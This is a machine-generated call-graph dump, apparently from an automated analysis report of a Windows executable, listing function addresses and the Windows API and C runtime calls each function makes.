92916->92917 92918 56436a 92916->92918 92919 50f4ea 48 API calls 92917->92919 92920 4f2b92 92919->92920 92921 4f2bb3 92920->92921 93072 4f2bce 48 API calls 92920->93072 92921->92829 92924 4fe8f6 92923->92924 92959 4fe906 Mailbox 92923->92959 92926 4fed52 92924->92926 92924->92959 92925 53cc5c 86 API calls 92925->92959 93167 50e3cd 335 API calls 92926->93167 92928 4febc7 92929 4febdd 92928->92929 93168 4f2ff6 16 API calls 92928->93168 92929->92863 92931 4fed63 92931->92929 92933 4fed70 92931->92933 92932 4fe94c PeekMessageW 92932->92959 93169 50e312 335 API calls Mailbox 92933->93169 92935 56526e Sleep 92935->92959 92936 4fed77 LockWindowUpdate DestroyWindow GetMessageW 92936->92929 92938 4feda9 92936->92938 92940 5659ef TranslateMessage DispatchMessageW GetMessageW 92938->92940 92940->92940 92941 565a1f 92940->92941 92941->92929 92942 4fed21 PeekMessageW 92942->92959 92943 50f4ea 48 API calls 92943->92959 92944 4febf7 timeGetTime 92944->92959 92946 4f6eed 48 API calls 92946->92959 92947 565557 WaitForSingleObject 92951 565574 GetExitCodeProcess CloseHandle 92947->92951 92947->92959 92948 4fed3a TranslateMessage DispatchMessageW 92948->92942 92950 56588f Sleep 92957 565429 Mailbox 92950->92957 92951->92959 92952 4fedae timeGetTime 93170 4f1caa 49 API calls 92952->93170 92954 565733 Sleep 92954->92957 92955 50dc38 timeGetTime 92955->92957 92957->92955 92957->92959 92962 565926 GetExitCodeProcess 92957->92962 92963 565445 Sleep 92957->92963 92966 565432 Sleep 92957->92966 92967 558c4b 108 API calls 92957->92967 92968 4f2c79 107 API calls 92957->92968 92970 5659ae Sleep 92957->92970 92977 4fd6e9 55 API calls 92957->92977 93172 4fd7f7 92957->93172 93177 534cbe 49 API calls Mailbox 92957->93177 93178 4f1caa 49 API calls 92957->93178 93179 4fce19 92957->93179 93185 4f2aae 335 API calls 92957->93185 93186 54ccb2 50 API calls 92957->93186 93187 537a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 92957->93187 93188 536532 63 API calls 3 library calls 92957->93188 92959->92925 92959->92928 92959->92932 92959->92935 92959->92942 92959->92943 92959->92944 92959->92946 92959->92947 92959->92948 92959->92950 92959->92952 92959->92954 92959->92957 92961 4f2aae 311 API calls 92959->92961 92959->92963 92971 4f1caa 49 API calls 92959->92971 92976 4ffe30 311 API calls 92959->92976 92980 503200 311 API calls 92959->92980 92982 4fd6e9 55 API calls 92959->92982 92983 4fce19 48 API calls 92959->92983 93073 4ff110 92959->93073 93138 5045e0 92959->93138 93155 50e244 92959->93155 93160 50dc5f 92959->93160 93165 4feed0 335 API calls Mailbox 92959->93165 93166 4fef00 86 API calls 92959->93166 93171 558d23 48 API calls 92959->93171 92961->92959 92964 565952 CloseHandle 92962->92964 92965 56593c WaitForSingleObject 92962->92965 92963->92959 92964->92957 92965->92959 92965->92964 92966->92963 92967->92957 92968->92957 92970->92959 92971->92959 92976->92959 92977->92957 92980->92959 92982->92959 92983->92959 92984->92812 92985->92865 92986->92863 92987->92863 92988->92863 92990 4ffe50 92989->92990 93013 4ffe7e 92989->93013 92992 50f4ea 48 API calls 92990->92992 92991 510f0a 52 API calls __cinit 92991->93013 92992->93013 92993 50146e 92994 4f6eed 48 API calls 92993->92994 93015 4fffe1 92994->93015 92995 4fd7f7 48 API calls 92995->93013 92997 500509 94062 53cc5c 86 API calls 4 library calls 92997->94062 92998 50f4ea 48 API calls 92998->93013 93000 501473 94061 53cc5c 86 API calls 4 library calls 93000->94061 93002 56a246 93007 4f6eed 48 API calls 93002->93007 93003 56a922 93003->92863 93006 4f6eed 48 API calls 93006->93013 93007->93015 93008 56a873 93008->92863 93009 5297ed InterlockedDecrement 93009->93013 93010 56a30e 93010->93015 94059 5297ed InterlockedDecrement 93010->94059 93012 56a973 94063 53cc5c 86 API calls 4 library calls 93012->94063 93013->92991 93013->92993 93013->92995 93013->92997 93013->92998 93013->93000 93013->93002 93013->93006 93013->93009 93013->93010 93013->93012 93013->93015 93017 5015b5 93013->93017 94057 501820 335 API calls 2 library calls 93013->94057 94058 501d10 59 API calls Mailbox 93013->94058 93015->92863 93016 56a982 94060 53cc5c 86 API calls 4 library calls 93017->94060 93018->92810 93019->92812 93021 4fd654 93020->93021 93028 4fd67e 93020->93028 93022 4fd65b 93021->93022 93024 4fd6c2 93021->93024 93023 4fd666 93022->93023 93029 4fd6ab 93022->93029 94064 4fd9a0 53 API calls __cinit 93023->94064 93024->93029 94066 50dce0 53 API calls 93024->94066 93028->92826 93028->92827 93029->93028 94065 50dce0 53 API calls 93029->94065 93030->92865 93031->92856 93032->92856 93033->92813 93034->92865 93035->92842 93036->92865 93037->92865 93038->92865 93039->92863 93040->92863 93041->92863 93042->92863 93044 4fd6f4 93043->93044 93046 4fd71b 93044->93046 94067 4fd764 55 API calls 93044->94067 93046->92841 93047->92865 93048->92859 93050 4f6ef8 93049->93050 93051 4f6f00 93049->93051 94068 4fdd47 48 API calls _memcpy_s 93050->94068 93051->92862 93053->92869 93054->92865 93056 4fbe0d 93055->93056 93060 4fbe0a _memcpy_s 93055->93060 93057 50f4ea 48 API calls 93056->93057 93058 4fbe17 93057->93058 93061 50ee75 93058->93061 93060->92914 93063 50f4ea __calloc_impl 93061->93063 93062 51395c __crtGetStringTypeA_stat 47 API calls 93062->93063 93063->93062 93064 50f50c 93063->93064 93065 50f50e std::exception::exception 93063->93065 93064->93060 93070 516805 RaiseException 93065->93070 93067 50f538 93071 51673b 47 API calls _free 93067->93071 93069 50f54a 93069->93060 93070->93067 93071->93069 93072->92921 93074 4ff130 93073->93074 93076 4ffe30 335 API calls 93074->93076 93080 4ff199 93074->93080 93075 4ff3dd 93079 5687c8 93075->93079 93091 4ff3f2 93075->93091 93125 4ff431 Mailbox 93075->93125 93078 568728 93076->93078 93077 4ff595 93084 4fd7f7 48 API calls 93077->93084 93077->93125 93078->93080 93206 53cc5c 86 API calls 4 library calls 93078->93206 93209 53cc5c 86 API calls 4 library calls 93079->93209 93080->93075 93080->93077 93086 4fd7f7 48 API calls 93080->93086 93117 4ff229 93080->93117 93081 4ffe30 335 API calls 93081->93125 93085 5687a3 93084->93085 93208 510f0a 52 API calls __cinit 93085->93208 93088 568772 93086->93088 93087 568b1b 93106 568bcf 93087->93106 93107 568b2c 93087->93107 93207 510f0a 52 API calls __cinit 93088->93207 93089 53cc5c 86 API calls 93089->93125 93097 4ff418 93091->93097 93210 539af1 48 API calls 93091->93210 93092 4ff770 93100 568a45 93092->93100 93116 4ff77a 93092->93116 93094 4fd6e9 55 API calls 93094->93125 93096 568c53 93224 53cc5c 86 API calls 4 library calls 93096->93224 93097->93087 93118 4ff6aa 93097->93118 93097->93125 93098 568810 93211 54eef8 335 API calls 93098->93211 93099 4ffe30 335 API calls 93099->93118 93216 50c1af 48 API calls 93100->93216 93101 568b7e 93219 54e40a 335 API calls Mailbox 93101->93219 93221 53cc5c 86 API calls 4 library calls 93106->93221 93218 54f5ee 335 API calls 93107->93218 93108 568beb 93222 54bdbd 335 API calls Mailbox 93108->93222 93112 501b90 48 API calls 93112->93125 93115 568c00 93136 4ff537 Mailbox 93115->93136 93223 53cc5c 86 API calls 4 library calls 93115->93223 93189 501b90 93116->93189 93117->93075 93117->93077 93117->93097 93117->93125 93118->93092 93118->93099 93119 4ffce0 93118->93119 93118->93125 93118->93136 93119->93136 93220 53cc5c 86 API calls 4 library calls 93119->93220 93121 568823 93121->93097 93124 56884b 93121->93124 93212 54ccdc 48 API calls 93124->93212 93125->93081 93125->93089 93125->93094 93125->93096 93125->93101 93125->93108 93125->93112 93125->93119 93125->93136 93205 4fdd47 48 API calls _memcpy_s 93125->93205 93217 5297ed InterlockedDecrement 93125->93217 93225 50c1af 48 API calls 93125->93225 93127 568857 93129 568865 93127->93129 93130 5688aa 93127->93130 93213 539b72 48 API calls 93129->93213 93133 5688a0 Mailbox 93130->93133 93214 53a69d 48 API calls 93130->93214 93131 4ffe30 335 API calls 93131->93136 93133->93131 93135 5688e7 93215 4fbc74 48 API calls 93135->93215 93136->92959 93139 504637 93138->93139 93140 50479f 93138->93140 93141 566e05 93139->93141 93142 504643 93139->93142 93143 4fce19 48 API calls 93140->93143 93288 54e822 335 API calls Mailbox 93141->93288 93287 504300 335 API calls _memcpy_s 93142->93287 93150 5046e4 Mailbox 93143->93150 93146 504739 Mailbox 93146->92959 93147 566e11 93147->93146 93289 53cc5c 86 API calls 4 library calls 93147->93289 93149 504659 93149->93146 93149->93147 93149->93150 93228 4f4252 93150->93228 93234 536524 93150->93234 93237 546ff0 93150->93237 93246 53fa0c 93150->93246 93156 50e253 93155->93156 93157 56df42 93155->93157 93156->92959 93158 56df77 93157->93158 93159 56df59 TranslateAcceleratorW 93157->93159 93159->93156 93161 50dca3 93160->93161 93162 50dc71 93160->93162 93161->92959 93162->93161 93163 50dc96 IsDialogMessageW 93162->93163 93164 56dd1d GetClassLongW 93162->93164 93163->93161 93163->93162 93164->93162 93164->93163 93165->92959 93166->92959 93167->92928 93168->92931 93169->92936 93170->92959 93171->92959 93173 50f4ea 48 API calls 93172->93173 93174 4fd818 93173->93174 93175 50f4ea 48 API calls 93174->93175 93176 4fd826 93175->93176 93176->92957 93177->92957 93178->92957 93180 4fce28 __NMSG_WRITE 93179->93180 93181 50ee75 48 API calls 93180->93181 93182 4fce50 _memcpy_s 93181->93182 93183 50f4ea 48 API calls 93182->93183 93184 4fce66 93183->93184 93184->92957 93185->92957 93186->92957 93187->92957 93188->92957 93190 501cf6 93189->93190 93192 501ba2 93189->93192 93190->93125 93191 501c5d 93191->93125 93195 50f4ea 48 API calls 93192->93195 93204 501bae 93192->93204 93194 501bb9 93194->93191 93198 50f4ea 48 API calls 93194->93198 93196 5649c4 93195->93196 93197 50f4ea 48 API calls 93196->93197 93203 5649cf 93197->93203 93199 501c9f 93198->93199 93200 501cb2 93199->93200 93226 4f2925 48 API calls 93199->93226 93200->93125 93202 50f4ea 48 API calls 93202->93203 93203->93202 93203->93204 93204->93194 93227 50c15c 48 API calls 93204->93227 93205->93125 93206->93080 93207->93117 93208->93125 93209->93136 93210->93098 93211->93121 93212->93127 93213->93133 93214->93135 93215->93133 93216->93125 93217->93125 93218->93125 93219->93119 93220->93136 93221->93136 93222->93115 93223->93136 93224->93136 93225->93125 93226->93200 93227->93194 93229 4f425c 93228->93229 93230 4f4263 93228->93230 93290 5135e4 93229->93290 93232 4f4283 FreeLibrary 93230->93232 93233 4f4272 93230->93233 93232->93233 93233->93146 93596 536ca9 GetFileAttributesW 93234->93596 93600 4f936c 93237->93600 93239 54702a 93620 4fb470 93239->93620 93241 54703a 93242 4ffe30 335 API calls 93241->93242 93243 54705f 93241->93243 93242->93243 93245 547063 93243->93245 93648 4fcdb9 48 API calls 93243->93648 93245->93146 93247 53fa1c __ftell_nolock 93246->93247 93248 53fa44 93247->93248 93767 4fd286 48 API calls 93247->93767 93250 4f936c 81 API calls 93248->93250 93251 53fa5e 93250->93251 93252 53fa80 93251->93252 93253 53fb68 93251->93253 93262 53fb92 93251->93262 93254 4f936c 81 API calls 93252->93254 93679 4f41a9 93253->93679 93260 53fa8c _wcscpy _wcschr 93254->93260 93257 53fb8e 93259 4f936c 81 API calls 93257->93259 93257->93262 93258 4f41a9 136 API calls 93258->93257 93261 53fbc7 93259->93261 93266 53fab0 _wcscat _wcscpy 93260->93266 93270 53fade _wcscat 93260->93270 93703 511dfc 93261->93703 93262->93146 93264 4f936c 81 API calls 93265 53fafc _wcscpy 93264->93265 93768 5372cb GetFileAttributesW 93265->93768 93268 4f936c 81 API calls 93266->93268 93268->93270 93269 53fb1c __NMSG_WRITE 93269->93262 93272 4f936c 81 API calls 93269->93272 93270->93264 93271 53fbeb _wcscat _wcscpy 93275 4f936c 81 API calls 93271->93275 93273 53fb48 93272->93273 93769 5360dd 77 API calls 4 library calls 93273->93769 93277 53fc82 93275->93277 93276 53fb5c 93276->93262 93706 53690b 93277->93706 93279 53fca2 93280 536524 3 API calls 93279->93280 93281 53fcb1 93280->93281 93282 4f936c 81 API calls 93281->93282 93285 53fce2 93281->93285 93283 53fccb 93282->93283 93712 53bfa4 93283->93712 93286 4f4252 84 API calls 93285->93286 93286->93262 93287->93149 93288->93147 93289->93146 93291 5135f0 __wsopen_helper 93290->93291 93292 513604 93291->93292 93293 51361c 93291->93293 93325 517c0e 47 API calls __getptd_noexit 93292->93325 93299 513614 __wsopen_helper 93293->93299 93303 514e1c 93293->93303 93296 513609 93326 516e10 8 API calls __swprintf 93296->93326 93299->93230 93304 514e2c 93303->93304 93305 514e4e EnterCriticalSection 93303->93305 93304->93305 93306 514e34 93304->93306 93307 51362e 93305->93307 93328 517cf4 93306->93328 93309 513578 93307->93309 93310 513587 93309->93310 93311 51359b 93309->93311 93413 517c0e 47 API calls __getptd_noexit 93310->93413 93313 513597 93311->93313 93373 512c84 93311->93373 93327 513653 LeaveCriticalSection LeaveCriticalSection _fprintf 93313->93327 93314 51358c 93414 516e10 8 API calls __swprintf 93314->93414 93321 5135b5 93390 51e9d2 93321->93390 93323 5135bb 93323->93313 93324 511c9d _free 47 API calls 93323->93324 93324->93313 93325->93296 93326->93299 93327->93299 93329 517d05 93328->93329 93330 517d18 EnterCriticalSection 93328->93330 93335 517d7c 93329->93335 93330->93307 93332 517d0b 93332->93330 93359 51115b 47 API calls 3 library calls 93332->93359 93336 517d88 __wsopen_helper 93335->93336 93337 517d91 93336->93337 93338 517da9 93336->93338 93360 5181c2 47 API calls __NMSG_WRITE 93337->93360 93340 517da7 93338->93340 93346 517e11 __wsopen_helper 93338->93346 93340->93338 93363 5169d0 47 API calls __crtGetStringTypeA_stat 93340->93363 93341 517d96 93361 51821f 47 API calls 5 library calls 93341->93361 93344 517dbd 93347 517dd3 93344->93347 93348 517dc4 93344->93348 93345 517d9d 93362 511145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93345->93362 93346->93332 93351 517cf4 __lock 46 API calls 93347->93351 93364 517c0e 47 API calls __getptd_noexit 93348->93364 93353 517dda 93351->93353 93352 517dc9 93352->93346 93354 517de9 InitializeCriticalSectionAndSpinCount 93353->93354 93355 517dfe 93353->93355 93356 517e04 93354->93356 93365 511c9d 93355->93365 93371 517e1a LeaveCriticalSection _doexit 93356->93371 93360->93341 93361->93345 93363->93344 93364->93352 93366 511ccf __dosmaperr 93365->93366 93367 511ca6 RtlFreeHeap 93365->93367 93366->93356 93367->93366 93368 511cbb 93367->93368 93372 517c0e 47 API calls __getptd_noexit 93368->93372 93370 511cc1 GetLastError 93370->93366 93371->93346 93372->93370 93374 512c97 93373->93374 93378 512cbb 93373->93378 93375 512933 __fseek_nolock 47 API calls 93374->93375 93374->93378 93376 512cb4 93375->93376 93415 51af61 93376->93415 93379 51eb36 93378->93379 93380 5135af 93379->93380 93381 51eb43 93379->93381 93383 512933 93380->93383 93381->93380 93382 511c9d _free 47 API calls 93381->93382 93382->93380 93384 512952 93383->93384 93385 51293d 93383->93385 93384->93321 93552 517c0e 47 API calls __getptd_noexit 93385->93552 93387 512942 93553 516e10 8 API calls __swprintf 93387->93553 93389 51294d 93389->93321 93391 51e9de __wsopen_helper 93390->93391 93392 51e9e6 93391->93392 93393 51e9fe 93391->93393 93569 517bda 47 API calls __getptd_noexit 93392->93569 93395 51ea7b 93393->93395 93400 51ea28 93393->93400 93573 517bda 47 API calls __getptd_noexit 93395->93573 93396 51e9eb 93570 517c0e 47 API calls __getptd_noexit 93396->93570 93399 51ea80 93574 517c0e 47 API calls __getptd_noexit 93399->93574 93402 51a8ed ___lock_fhandle 49 API calls 93400->93402 93403 51ea2e 93402->93403 93405 51ea41 93403->93405 93406 51ea4c 93403->93406 93404 51ea88 93575 516e10 8 API calls __swprintf 93404->93575 93554 51ea9c 93405->93554 93571 517c0e 47 API calls __getptd_noexit 93406->93571 93410 51ea47 93572 51ea73 LeaveCriticalSection __unlock_fhandle 93410->93572 93411 51e9f3 __wsopen_helper 93411->93323 93413->93314 93414->93313 93416 51af6d __wsopen_helper 93415->93416 93417 51af75 93416->93417 93418 51af8d 93416->93418 93513 517bda 47 API calls __getptd_noexit 93417->93513 93420 51b022 93418->93420 93425 51afbf 93418->93425 93518 517bda 47 API calls __getptd_noexit 93420->93518 93421 51af7a 93514 517c0e 47 API calls __getptd_noexit 93421->93514 93424 51b027 93519 517c0e 47 API calls __getptd_noexit 93424->93519 93440 51a8ed 93425->93440 93428 51af82 __wsopen_helper 93428->93378 93429 51b02f 93520 516e10 8 API calls __swprintf 93429->93520 93430 51afc5 93432 51afd8 93430->93432 93433 51afeb 93430->93433 93449 51b043 93432->93449 93515 517c0e 47 API calls __getptd_noexit 93433->93515 93436 51aff0 93516 517bda 47 API calls __getptd_noexit 93436->93516 93437 51afe4 93517 51b01a LeaveCriticalSection __unlock_fhandle 93437->93517 93441 51a8f9 __wsopen_helper 93440->93441 93442 51a946 EnterCriticalSection 93441->93442 93443 517cf4 __lock 47 API calls 93441->93443 93444 51a96c __wsopen_helper 93442->93444 93445 51a91d 93443->93445 93444->93430 93446 51a928 InitializeCriticalSectionAndSpinCount 93445->93446 93447 51a93a 93445->93447 93446->93447 93521 51a970 LeaveCriticalSection _doexit 93447->93521 93450 51b050 __ftell_nolock 93449->93450 93451 51b08d 93450->93451 93452 51b0ac 93450->93452 93482 51b082 93450->93482 93531 517bda 47 API calls __getptd_noexit 93451->93531 93457 51b105 93452->93457 93458 51b0e9 93452->93458 93455 51b86b 93455->93437 93456 51b092 93532 517c0e 47 API calls __getptd_noexit 93456->93532 93460 51b11c 93457->93460 93537 51f82f 49 API calls 3 library calls 93457->93537 93534 517bda 47 API calls __getptd_noexit 93458->93534 93522 523bf2 93460->93522 93462 51b099 93533 516e10 8 API calls __swprintf 93462->93533 93465 51b0ee 93535 517c0e 47 API calls __getptd_noexit 93465->93535 93467 51b12a 93469 51b44b 93467->93469 93538 517a0d 47 API calls 2 library calls 93467->93538 93472 51b463 93469->93472 93473 51b7b8 WriteFile 93469->93473 93470 51b0f5 93536 516e10 8 API calls __swprintf 93470->93536 93476 51b55a 93472->93476 93480 51b479 93472->93480 93474 51b7e1 GetLastError 93473->93474 93484 51b410 93473->93484 93474->93484 93487 51b663 93476->93487 93490 51b565 93476->93490 93477 51b150 GetConsoleMode 93477->93469 93479 51b189 93477->93479 93478 51b81b 93478->93482 93543 517c0e 47 API calls __getptd_noexit 93478->93543 93479->93469 93485 51b199 GetConsoleCP 93479->93485 93480->93478 93481 51b4e9 WriteFile 93480->93481 93481->93474 93486 51b526 93481->93486 93545 51a70c 93482->93545 93484->93478 93484->93482 93489 51b7f7 93484->93489 93485->93484 93507 51b1c2 93485->93507 93486->93480 93486->93484 93498 51b555 93486->93498 93487->93478 93491 51b6d8 WideCharToMultiByte 93487->93491 93488 51b843 93544 517bda 47 API calls __getptd_noexit 93488->93544 93493 51b812 93489->93493 93494 51b7fe 93489->93494 93490->93478 93495 51b5de WriteFile 93490->93495 93491->93474 93505 51b71f 93491->93505 93542 517bed 47 API calls 3 library calls 93493->93542 93540 517c0e 47 API calls __getptd_noexit 93494->93540 93495->93474 93497 51b62d 93495->93497 93497->93484 93497->93490 93497->93498 93498->93484 93500 51b727 WriteFile 93503 51b77a GetLastError 93500->93503 93500->93505 93501 51b803 93541 517bda 47 API calls __getptd_noexit 93501->93541 93503->93505 93505->93484 93505->93487 93505->93498 93505->93500 93506 5240f7 59 API calls __chsize_nolock 93506->93507 93507->93484 93507->93506 93508 51b28f WideCharToMultiByte 93507->93508 93509 51b2f6 93507->93509 93539 511688 57 API calls __isleadbyte_l 93507->93539 93508->93484 93510 51b2ca WriteFile 93508->93510 93509->93474 93509->93484 93509->93507 93511 525884 WriteConsoleW CreateFileW __chsize_nolock 93509->93511 93512 51b321 WriteFile 93509->93512 93510->93474 93510->93509 93511->93509 93512->93474 93512->93509 93513->93421 93514->93428 93515->93436 93516->93437 93517->93428 93518->93424 93519->93429 93520->93428 93521->93442 93523 523c0a 93522->93523 93524 523bfd 93522->93524 93527 523c16 93523->93527 93528 517c0e __fseek_nolock 47 API calls 93523->93528 93525 517c0e __fseek_nolock 47 API calls 93524->93525 93526 523c02 93525->93526 93526->93467 93527->93467 93529 523c37 93528->93529 93530 516e10 __swprintf 8 API calls 93529->93530 93530->93526 93531->93456 93532->93462 93533->93482 93534->93465 93535->93470 93536->93482 93537->93460 93538->93477 93539->93507 93540->93501 93541->93482 93542->93482 93543->93488 93544->93482 93546 51a714 93545->93546 93547 51a716 IsProcessorFeaturePresent 93545->93547 93546->93455 93549 5237b0 93547->93549 93550 52375f ___raise_securityfailure 5 API calls 93549->93550 93551 523893 93550->93551 93551->93455 93552->93387 93553->93389 93576 51aba4 93554->93576 93556 51eb00 93589 51ab1e 48 API calls 2 library calls 93556->93589 93558 51eaaa 93558->93556 93560 51aba4 __lseeki64_nolock 47 API calls 93558->93560 93568 51eade 93558->93568 93559 51eb08 93566 51eb2a 93559->93566 93590 517bed 47 API calls 3 library calls 93559->93590 93562 51ead5 93560->93562 93561 51aba4 __lseeki64_nolock 47 API calls 93563 51eaea CloseHandle 93561->93563 93567 51aba4 __lseeki64_nolock 47 API calls 93562->93567 93563->93556 93564 51eaf6 GetLastError 93563->93564 93564->93556 93566->93410 93567->93568 93568->93556 93568->93561 93569->93396 93570->93411 93571->93410 93572->93411 93573->93399 93574->93404 93575->93411 93577 51abaf 93576->93577 93579 51abc4 93576->93579 93591 517bda 47 API calls __getptd_noexit 93577->93591 93582 51abe9 93579->93582 93593 517bda 47 API calls __getptd_noexit 93579->93593 93581 51abb4 93592 517c0e 47 API calls __getptd_noexit 93581->93592 93582->93558 93583 51abf3 93594 517c0e 47 API calls __getptd_noexit 93583->93594 93586 51abbc 93586->93558 93587 51abfb 93595 516e10 8 API calls __swprintf 93587->93595 93589->93559 93590->93566 93591->93581 93592->93586 93593->93583 93594->93587 93595->93586 93597 536529 93596->93597 93598 536cc4 FindFirstFileW 93596->93598 93597->93146 93598->93597 93599 536cd9 FindClose 93598->93599 93599->93597 93601 4f9384 93600->93601 93615 4f9380 93600->93615 93602 564cbd __i64tow 93601->93602 93603 4f9398 93601->93603 93604 564bbf 93601->93604 93613 4f93b0 __itow Mailbox _wcscpy 93601->93613 93649 51172b 80 API calls 3 library calls 93603->93649 93606 564ca5 93604->93606 93607 564bc8 93604->93607 93650 51172b 80 API calls 3 library calls 93606->93650 93611 564be7 93607->93611 93607->93613 93608 50f4ea 48 API calls 93610 4f93ba 93608->93610 93614 4fce19 48 API calls 93610->93614 93610->93615 93612 50f4ea 48 API calls 93611->93612 93616 564c04 93612->93616 93613->93608 93614->93615 93615->93239 93617 50f4ea 48 API calls 93616->93617 93618 564c2a 93617->93618 93618->93615 93619 4fce19 48 API calls 93618->93619 93619->93615 93651 4f6b0f 93620->93651 93622 4fb69b 93663 4fba85 93622->93663 93624 4fb6b5 Mailbox 93624->93241 93627 56397b 93677 5326bc 88 API calls 4 library calls 93627->93677 93629 4fb9e4 93678 5326bc 88 API calls 4 library calls 93629->93678 93631 563973 93631->93624 93634 4fba85 48 API calls 93641 4fb495 93634->93641 93635 563989 93637 4fba85 48 API calls 93635->93637 93636 4fbcce 48 API calls 93636->93641 93637->93631 93638 563909 93673 4f6b4a 93638->93673 93641->93622 93641->93627 93641->93629 93641->93634 93641->93636 93641->93638 93644 4fbdfa 48 API calls 93641->93644 93647 563939 _memcpy_s 93641->93647 93656 4fc413 59 API calls 93641->93656 93657 4fbb85 93641->93657 93662 4fbc74 48 API calls 93641->93662 93671 4fc6a5 49 API calls 93641->93671 93672 4fc799 48 API calls _memcpy_s 93641->93672 93642 563914 93646 50f4ea 48 API calls 93642->93646 93645 4fb66c CharUpperBuffW 93644->93645 93645->93641 93646->93647 93676 5326bc 88 API calls 4 library calls 93647->93676 93648->93245 93649->93613 93650->93613 93652 50f4ea 48 API calls 93651->93652 93653 4f6b34 93652->93653 93654 4f6b4a 48 API calls 93653->93654 93655 4f6b43 93654->93655 93655->93641 93656->93641 93658 4fbb9b 93657->93658 93661 4fbb96 _memcpy_s 93657->93661 93659 561b77 93658->93659 93660 50ee75 48 API calls 93658->93660 93660->93661 93661->93641 93662->93641 93664 4fbb25 93663->93664 93667 4fba98 _memcpy_s 93663->93667 93666 50f4ea 48 API calls 93664->93666 93665 50f4ea 48 API calls 93669 4fba9f 93665->93669 93666->93667 93667->93665 93668 4fbac8 93668->93624 93669->93668 93670 50f4ea 48 API calls 93669->93670 93670->93668 93671->93641 93672->93641 93674 50f4ea 48 API calls 93673->93674 93675 4f6b54 93674->93675 93675->93642 93676->93631 93677->93635 93678->93631 93770 4f4214 93679->93770 93684 564f73 93687 4f4252 84 API calls 93684->93687 93685 4f41d4 LoadLibraryExW 93780 4f4291 93685->93780 93689 564f7a 93687->93689 93691 4f4291 3 API calls 93689->93691 93693 564f82 93691->93693 93692 4f41fb 93692->93693 93694 4f4207 93692->93694 93806 4f44ed 93693->93806 93696 4f4252 84 API calls 93694->93696 93698 4f420c 93696->93698 93698->93257 93698->93258 93700 564fa9 93814 4f4950 93700->93814 93989 511e46 93703->93989 93707 536918 _wcschr __ftell_nolock 93706->93707 93708 511dfc __wsplitpath 47 API calls 93707->93708 93711 53692e _wcscat _wcscpy 93707->93711 93709 53695d 93708->93709 93710 511dfc __wsplitpath 47 API calls 93709->93710 93710->93711 93711->93279 93713 53bfb1 __ftell_nolock 93712->93713 93714 50f4ea 48 API calls 93713->93714 93715 53c00e 93714->93715 93716 4f47b7 48 API calls 93715->93716 93717 53c018 93716->93717 93718 53bdb4 GetSystemTimeAsFileTime 93717->93718 93719 53c023 93718->93719 93720 4f4517 83 API calls 93719->93720 93721 53c036 _wcscmp 93720->93721 93722 53c107 93721->93722 93723 53c05a 93721->93723 93724 53c56d 94 API calls 93722->93724 94032 53c56d 93723->94032 93740 53c0d3 _wcscat 93724->93740 93727 511dfc __wsplitpath 47 API calls 93732 53c088 _wcscat _wcscpy 93727->93732 93728 4f44ed 64 API calls 93730 53c12c 93728->93730 93729 53c110 93729->93285 93731 4f44ed 64 API calls 93730->93731 93733 53c13c 93731->93733 93735 511dfc __wsplitpath 47 API calls 93732->93735 93734 4f44ed 64 API calls 93733->93734 93736 53c157 93734->93736 93735->93740 93737 4f44ed 64 API calls 93736->93737 93738 53c167 93737->93738 93739 4f44ed 64 API calls 93738->93739 93741 53c182 93739->93741 93740->93728 93740->93729 93742 4f44ed 64 API calls 93741->93742 93743 53c192 93742->93743 93744 4f44ed 64 API calls 93743->93744 93745 53c1a2 93744->93745 93746 4f44ed 64 API calls 93745->93746 93747 53c1b2 93746->93747 94015 53c71a GetTempPathW GetTempFileNameW 93747->94015 93749 53c1be 93750 513499 117 API calls 93749->93750 93761 53c1cf 93750->93761 93751 53c289 93752 5135e4 __fcloseall 83 API calls 93751->93752 93753 53c294 93752->93753 93755 53c29a DeleteFileW 93753->93755 93756 53c2ae 93753->93756 93754 4f44ed 64 API calls 93754->93761 93755->93729 93757 53c342 CopyFileW 93756->93757 93762 53c2b8 93756->93762 93758 53c36a DeleteFileW 93757->93758 93759 53c358 DeleteFileW 93757->93759 94029 53c6d9 CreateFileW 93758->94029 93759->93729 93761->93729 93761->93751 93761->93754 94016 512aae 93761->94016 94038 53b965 118 API calls __fcloseall 93762->94038 93765 53c32d 93765->93758 93766 53c331 DeleteFileW 93765->93766 93766->93729 93767->93248 93768->93269 93769->93276 93819 4f4339 93770->93819 93773 4f41bb 93777 513499 93773->93777 93774 4f4244 FreeLibrary 93774->93773 93776 4f423c 93776->93773 93776->93774 93827 5134ae 93777->93827 93779 4f41c8 93779->93684 93779->93685 93906 4f42e4 93780->93906 93783 4f42b8 93785 4f41ec 93783->93785 93786 4f42c1 FreeLibrary 93783->93786 93787 4f4380 93785->93787 93786->93785 93788 50f4ea 48 API calls 93787->93788 93789 4f4395 93788->93789 93914 4f47b7 93789->93914 93791 4f43a1 _memcpy_s 93792 4f43dc 93791->93792 93794 4f4499 93791->93794 93795 4f44d1 93791->93795 93793 4f4950 57 API calls 93792->93793 93803 4f43e5 93793->93803 93917 4f406b CreateStreamOnHGlobal 93794->93917 93928 53c750 93 API calls 93795->93928 93798 4f44ed 64 API calls 93798->93803 93800 4f4479 93800->93692 93801 564ed7 93802 4f4517 83 API calls 93801->93802 93804 564eeb 93802->93804 93803->93798 93803->93800 93803->93801 93923 4f4517 93803->93923 93805 4f44ed 64 API calls 93804->93805 93805->93800 93807 4f44ff 93806->93807 93808 564fc0 93806->93808 93946 51381e 93807->93946 93811 53bf5a 93966 53bdb4 93811->93966 93813 53bf70 93813->93700 93815 4f495f 93814->93815 93816 565002 93814->93816 93971 513e65 93815->93971 93818 4f4967 93823 4f434b 93819->93823 93822 4f4321 LoadLibraryA GetProcAddress 93822->93776 93824 4f422f 93823->93824 93825 4f4354 LoadLibraryA 93823->93825 93824->93776 93824->93822 93825->93824 93826 4f4365 GetProcAddress 93825->93826 93826->93824 93830 5134ba __wsopen_helper 93827->93830 93828 5134cd 93875 517c0e 47 API calls __getptd_noexit 93828->93875 93830->93828 93831 5134fe 93830->93831 93846 51e4c8 93831->93846 93832 5134d2 93876 516e10 8 API calls __swprintf 93832->93876 93835 513503 93836 513519 93835->93836 93837 51350c 93835->93837 93839 513543 93836->93839 93840 513523 93836->93840 93877 517c0e 47 API calls __getptd_noexit 93837->93877 93860 51e5e0 93839->93860 93878 517c0e 47 API calls __getptd_noexit 93840->93878 93841 5134dd __wsopen_helper @_EH4_CallFilterFunc@8 93841->93779 93847 51e4d4 __wsopen_helper 93846->93847 93848 517cf4 __lock 47 API calls 93847->93848 93849 51e4e2 93848->93849 